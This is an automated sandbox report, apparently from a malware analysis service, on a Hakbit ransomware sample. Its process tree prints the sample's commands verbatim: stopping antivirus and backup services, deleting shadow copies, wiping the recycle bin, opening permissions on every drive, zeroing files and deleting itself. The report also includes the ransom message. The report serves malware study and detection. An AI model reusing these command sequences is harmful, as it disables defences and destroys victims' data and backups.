hakbit | e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62

Resubmissions

17-11-2020 12:01

201117-yzjn4s5cdn 10

18-06-2020 04:28

200618-tg948yvz5n 10

Analysis

max time kernel
139s
max time network
97s
platform
windows7_x64
resource
win7v200430
submitted
18-06-2020 04:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

System.exe
Size

66KB
MD5

8d6ab03994b0ce3466873aa7532fe76b
SHA1

156aecd4d8e65d205181ad5eace466c8798d3c86
SHA256

e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62
SHA512

2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c

Score

10^/10

ransomware hakbit spyware discovery persistence

Malware Config

Signatures

Suspicious use of WriteProcessMemory 390 IoCs

Processes:

System.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1312 wrote to memory of 1480	1312	System.exe	net.exe
PID 1312 wrote to memory of 1480	1312	System.exe	net.exe
PID 1312 wrote to memory of 1480	1312	System.exe	net.exe
PID 1480 wrote to memory of 544	1480	net.exe	net1.exe
PID 1480 wrote to memory of 544	1480	net.exe	net1.exe
PID 1480 wrote to memory of 544	1480	net.exe	net1.exe
PID 1312 wrote to memory of 1012	1312	System.exe	net.exe
PID 1312 wrote to memory of 1012	1312	System.exe	net.exe
PID 1312 wrote to memory of 1012	1312	System.exe	net.exe
PID 1012 wrote to memory of 1612	1012	net.exe	net1.exe
PID 1012 wrote to memory of 1612	1012	net.exe	net1.exe
PID 1012 wrote to memory of 1612	1012	net.exe	net1.exe
PID 1312 wrote to memory of 240	1312	System.exe	net.exe
PID 1312 wrote to memory of 240	1312	System.exe	net.exe
PID 1312 wrote to memory of 240	1312	System.exe	net.exe
PID 240 wrote to memory of 1068	240	net.exe	net1.exe
PID 240 wrote to memory of 1068	240	net.exe	net1.exe
PID 240 wrote to memory of 1068	240	net.exe	net1.exe
PID 1312 wrote to memory of 1088	1312	System.exe	net.exe
PID 1312 wrote to memory of 1088	1312	System.exe	net.exe
PID 1312 wrote to memory of 1088	1312	System.exe	net.exe
PID 1088 wrote to memory of 1520	1088	net.exe	net1.exe
PID 1088 wrote to memory of 1520	1088	net.exe	net1.exe
PID 1088 wrote to memory of 1520	1088	net.exe	net1.exe
PID 1312 wrote to memory of 1668	1312	System.exe	net.exe
PID 1312 wrote to memory of 1668	1312	System.exe	net.exe
PID 1312 wrote to memory of 1668	1312	System.exe	net.exe
PID 1668 wrote to memory of 1360	1668	net.exe	net1.exe
PID 1668 wrote to memory of 1360	1668	net.exe	net1.exe
PID 1668 wrote to memory of 1360	1668	net.exe	net1.exe
PID 1312 wrote to memory of 1764	1312	System.exe	net.exe
PID 1312 wrote to memory of 1764	1312	System.exe	net.exe
PID 1312 wrote to memory of 1764	1312	System.exe	net.exe
PID 1764 wrote to memory of 1824	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1824	1764	net.exe	net1.exe
PID 1764 wrote to memory of 1824	1764	net.exe	net1.exe
PID 1312 wrote to memory of 1836	1312	System.exe	net.exe
PID 1312 wrote to memory of 1836	1312	System.exe	net.exe
PID 1312 wrote to memory of 1836	1312	System.exe	net.exe
PID 1836 wrote to memory of 1844	1836	net.exe	net1.exe
PID 1836 wrote to memory of 1844	1836	net.exe	net1.exe
PID 1836 wrote to memory of 1844	1836	net.exe	net1.exe
PID 1312 wrote to memory of 1788	1312	System.exe	net.exe
PID 1312 wrote to memory of 1788	1312	System.exe	net.exe
PID 1312 wrote to memory of 1788	1312	System.exe	net.exe
PID 1788 wrote to memory of 1768	1788	net.exe	net1.exe
PID 1788 wrote to memory of 1768	1788	net.exe	net1.exe
PID 1788 wrote to memory of 1768	1788	net.exe	net1.exe
PID 1312 wrote to memory of 652	1312	System.exe	net.exe
PID 1312 wrote to memory of 652	1312	System.exe	net.exe
PID 1312 wrote to memory of 652	1312	System.exe	net.exe
PID 652 wrote to memory of 864	652	net.exe	net1.exe
PID 652 wrote to memory of 864	652	net.exe	net1.exe
PID 652 wrote to memory of 864	652	net.exe	net1.exe
PID 1312 wrote to memory of 984	1312	System.exe	net.exe
PID 1312 wrote to memory of 984	1312	System.exe	net.exe
PID 1312 wrote to memory of 984	1312	System.exe	net.exe
PID 984 wrote to memory of 616	984	net.exe	net1.exe
PID 984 wrote to memory of 616	984	net.exe	net1.exe
PID 984 wrote to memory of 616	984	net.exe	net1.exe
PID 1312 wrote to memory of 1316	1312	System.exe	net.exe
PID 1312 wrote to memory of 1316	1312	System.exe	net.exe
PID 1312 wrote to memory of 1316	1312	System.exe	net.exe
PID 1316 wrote to memory of 1624	1316	net.exe	net1.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

System.exe

pid process

1312 System.exe
1312 System.exe
1312 System.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1292 notepad.exe
Drops startup file 1 IoCs

Processes:

System.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk System.exe

pid	process
1312	System.exe
1312	System.exe
1312	System.exe

pid	process
1292	notepad.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	System.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

System.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	System.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "\r\n* ATTENTION *\r\nYour File Locked By \"Military Algorithm\" And Wiped. \r\nFor Recovery Your Files Contact : l1u1t1@secmail.pro"	System.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

System.exenotepad.exe

pid process

1312 System.exe
1312 System.exe
1312 System.exe
1292 notepad.exe
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
ransomware hakbit
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

pid	process
1312	System.exe
1312	System.exe
1312	System.exe
1292	notepad.exe

Modifies file permissions 1 TTPs 29 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
608	icacls.exe
232	icacls.exe
1104	icacls.exe
216	icacls.exe
1080	icacls.exe
1544	icacls.exe
1208	icacls.exe
544	icacls.exe
1612	icacls.exe
1932	icacls.exe
1516	icacls.exe
1056	icacls.exe
236	icacls.exe
1108	icacls.exe
1308	icacls.exe
324	icacls.exe
872	icacls.exe
1560	icacls.exe
748	icacls.exe
632	icacls.exe
1040	icacls.exe
1804	icacls.exe
1696	icacls.exe
1292	icacls.exe
872	icacls.exe
1504	icacls.exe
1828	icacls.exe
1824	icacls.exe
1008	icacls.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

System.exetaskkill.exetaskkill.exetaskkill.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1312	System.exe
Token: SeDebugPrivilege	1852	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	1000	taskkill.exe
Token: SeBackupPrivilege	2004	vssvc.exe
Token: SeRestorePrivilege	2004	vssvc.exe
Token: SeAuditPrivilege	2004	vssvc.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

324 cmd.exe

pid	process
324	cmd.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
1632	vssadmin.exe
1044	vssadmin.exe
1116	vssadmin.exe
744	vssadmin.exe
1524	vssadmin.exe
780	vssadmin.exe
1212	vssadmin.exe
2028	vssadmin.exe
1556	vssadmin.exe
1508	vssadmin.exe
1936	vssadmin.exe
520	vssadmin.exe
1624	vssadmin.exe
212	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1852 taskkill.exe
1324 taskkill.exe
1000 taskkill.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1104 PING.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

pid	process
1852	taskkill.exe
1324	taskkill.exe
1000	taskkill.exe

pid	process
1104	PING.EXE

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

C:\Users\Admin\AppData\Local\Temp\System.exe
"C:\Users\Admin\AppData\Local\Temp\System.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
- Drops startup file
- Modifies WinLogon
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
PID:1312

C:\Windows\system32\net.exe
"net.exe" stop avpsus /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:544

C:\Windows\system32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:1612

C:\Windows\system32\net.exe
"net.exe" stop mfewc /y
2⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:1068

C:\Windows\system32\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
3⤵
PID:1520

C:\Windows\system32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3⤵
PID:1360

C:\Windows\system32\net.exe
"net.exe" stop DefWatch /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
3⤵
PID:1824

C:\Windows\system32\net.exe
"net.exe" stop ccEvtMgr /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
3⤵
PID:1844

C:\Windows\system32\net.exe
"net.exe" stop ccSetMgr /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
3⤵
PID:1768

C:\Windows\system32\net.exe
"net.exe" stop SavRoam /y
2⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
3⤵
PID:864

C:\Windows\system32\net.exe
"net.exe" stop RTVscan /y
2⤵
- Suspicious use of WriteProcessMemory
PID:984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
3⤵
PID:616

C:\Windows\system32\net.exe
"net.exe" stop QBFCService /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
3⤵
PID:1624

C:\Windows\system32\net.exe
"net.exe" stop QBIDPService /y
2⤵
PID:1592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
3⤵
PID:1636

C:\Windows\system32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
2⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
3⤵
PID:1896

C:\Windows\system32\net.exe
"net.exe" stop QBCFMonitorService /y
2⤵
PID:1948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
3⤵
PID:1888

C:\Windows\system32\net.exe
"net.exe" stop YooBackup /y
2⤵
PID:1892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
3⤵
PID:1968

C:\Windows\system32\net.exe
"net.exe" stop YooIT /y
2⤵
PID:1980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
3⤵
PID:2028

C:\Windows\system32\net.exe
"net.exe" stop zhudongfangyu /y
2⤵
PID:856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
3⤵
PID:1200

C:\Windows\system32\net.exe
"net.exe" stop stc_raw_agent /y
2⤵
PID:1104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
3⤵
PID:1484

C:\Windows\system32\net.exe
"net.exe" stop VSNAPVSS /y
2⤵
PID:1492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
3⤵
PID:1572

C:\Windows\system32\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:1612

C:\Windows\system32\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:324

C:\Windows\system32\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:1064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:1524

C:\Windows\system32\net.exe
"net.exe" stop veeam /y
2⤵
PID:1376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
3⤵
PID:1380

C:\Windows\system32\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:1816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:1828

C:\Windows\system32\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:1792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:1784

C:\Windows\system32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:1768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:568

C:\Windows\system32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:1516

C:\Windows\system32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
2⤵
PID:300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
3⤵
PID:1624

C:\Windows\system32\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:1256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:1600

C:\Windows\system32\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:1568

C:\Windows\system32\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:1908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:1900

C:\Windows\system32\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:1984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
3⤵
PID:1972

C:\Windows\system32\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:2032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:1100

C:\Windows\system32\net.exe
"net.exe" stop CASAD2DWebSvc /y
2⤵
PID:1200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
3⤵
PID:1488

C:\Windows\system32\net.exe
"net.exe" stop CAARCUpdateSvc /y
2⤵
PID:1084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
3⤵
PID:544

C:\Windows\system32\net.exe
"net.exe" stop sophos /y
2⤵
PID:1060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
3⤵
PID:1612

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:1616

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1068

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1092

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1380

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1852

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1324

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1000

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:1936

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:1116

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:780

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:744

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:1212

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:520

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:1624

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:1632

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:2028

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:212

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:1556

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
2⤵
- Interacts with shadow copies
PID:1044

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
2⤵
- Interacts with shadow copies
PID:1508

C:\Windows\system32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:1524

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
2⤵
PID:1848

C:\Windows\system32\arp.exe
"arp" -a
2⤵
PID:1600

C:\Windows\system32\icacls.exe
"icacls.exe" A:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:608

C:\Windows\system32\icacls.exe
"icacls.exe" B:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:236

C:\Windows\system32\icacls.exe
"icacls.exe" D:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1040

C:\Windows\system32\icacls.exe
"icacls.exe" E:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:872

C:\Windows\system32\icacls.exe
"icacls.exe" F:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1612

C:\Windows\system32\icacls.exe
"icacls.exe" G:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1504

C:\Windows\system32\icacls.exe
"icacls.exe" H:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1804

C:\Windows\system32\icacls.exe
"icacls.exe" I:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1828

C:\Windows\system32\icacls.exe
"icacls.exe" J:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1932

C:\Windows\system32\icacls.exe
"icacls.exe" K:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:216

C:\Windows\system32\icacls.exe
"icacls.exe" L:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1560

C:\Windows\system32\icacls.exe
"icacls.exe" M:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:748

C:\Windows\system32\icacls.exe
"icacls.exe" N:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1080

C:\Windows\system32\icacls.exe
"icacls.exe" O:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1516

C:\Windows\system32\icacls.exe
"icacls.exe" P:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1056

C:\Windows\system32\icacls.exe
"icacls.exe" Q:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1544

C:\Windows\system32\icacls.exe
"icacls.exe" R:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:544

C:\Windows\system32\icacls.exe
"icacls.exe" S:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1696

C:\Windows\system32\icacls.exe
"icacls.exe" T:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1292

C:\Windows\system32\icacls.exe
"icacls.exe" U:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:632

C:\Windows\system32\icacls.exe
"icacls.exe" V:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1108

C:\Windows\system32\icacls.exe
"icacls.exe" W:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1824

C:\Windows\system32\icacls.exe
"icacls.exe" X:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1308

C:\Windows\system32\icacls.exe
"icacls.exe" Y:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:232

C:\Windows\system32\icacls.exe
"icacls.exe" Z:\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1208

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1008

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1104

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:872

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:324

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1292

C:\Windows\system32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:364

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:1104

C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:1576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\System.exe
2⤵
- Deletes itself
PID:324

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:2012

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:2004

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1764

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1896

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Winlogon Helper DLL

T1004

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

File Deletion

T1107

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Download Submit
C:\Users\Admin\AppData\Local\Temp\HELP_ME_RECOVER_MY_FILES.txt

Download Submit
C:\Users\Admin\AppData\Local\Temp\ox125cvy.exe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk

Download Submit
C:\Users\Admin\Desktop\EnableInitialize.odt.crypted

Download Submit
C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt

Download Submit
C:\Users\Admin\Desktop\InitializeStart.m4a.crypted

Download Submit
C:\Users\Admin\Desktop\InstallSkip.snd.crypted

Download Submit
C:\Users\Admin\Desktop\OutUse.png.crypted

Download Submit
C:\Users\Admin\Desktop\RestartImport.mp3.crypted

Download Submit
C:\Users\Admin\Desktop\ResumeDebug.7z.crypted

Download Submit
C:\Users\Admin\Desktop\SkipSet.gif.crypted

Download Submit
C:\Users\Admin\Desktop\UnregisterRequest.ods.crypted

Download Submit
C:\Users\Admin\Documents\Are.docx.crypted

Download Submit
C:\Users\Admin\Documents\CompleteDisconnect.odt.crypted

Download Submit
C:\Users\Admin\Documents\ConfirmEdit.doc.crypted

Download Submit
C:\Users\Admin\Documents\ConnectClose.ods.crypted

Download Submit
C:\Users\Admin\Documents\Files.docx.crypted

Download Submit
C:\Users\Admin\Documents\LockHide.pdf.crypted

Download Submit
C:\Users\Admin\Documents\MergeLimit.rtf.crypted

Download Submit
C:\Users\Admin\Documents\NewResolve.pptx.crypted

Download Submit
C:\Users\Admin\Documents\OpenSend.docx.crypted

Download Submit
C:\Users\Admin\Documents\Opened.docx.crypted

Download Submit
C:\Users\Admin\Documents\Recently.docx.crypted

Download Submit
C:\Users\Admin\Documents\RequestAdd.html.crypted

Download Submit
C:\Users\Admin\Documents\RestartRestore.mhtml.crypted

Download Submit
C:\Users\Admin\Documents\StartOpen.txt.crypted

Download Submit
C:\Users\Admin\Documents\SyncWait.csv.crypted

Download Submit
C:\Users\Admin\Documents\These.docx.crypted

Download Submit
C:\Users\Admin\Documents\TraceMeasure.ods.crypted

Download Submit
C:\Users\Admin\Documents\UseDeny.ods.crypted

Download Submit
C:\Users\Admin\Music\AssertUninstall.mhtml.crypted

Download Submit
C:\Users\Admin\Music\CompleteUpdate.mp4.crypted

Download Submit
C:\Users\Admin\Music\EditUse.mp3.crypted

Download Submit
C:\Users\Admin\Music\ImportMove.m4a.crypted

Download Submit
C:\Users\Admin\Music\OutClose.zip.crypted

Download Submit
C:\Users\Admin\Music\ResolveUnprotect.7z.crypted

Download Submit
C:\Users\Admin\Pictures\AddConvertTo.png.crypted

Download Submit
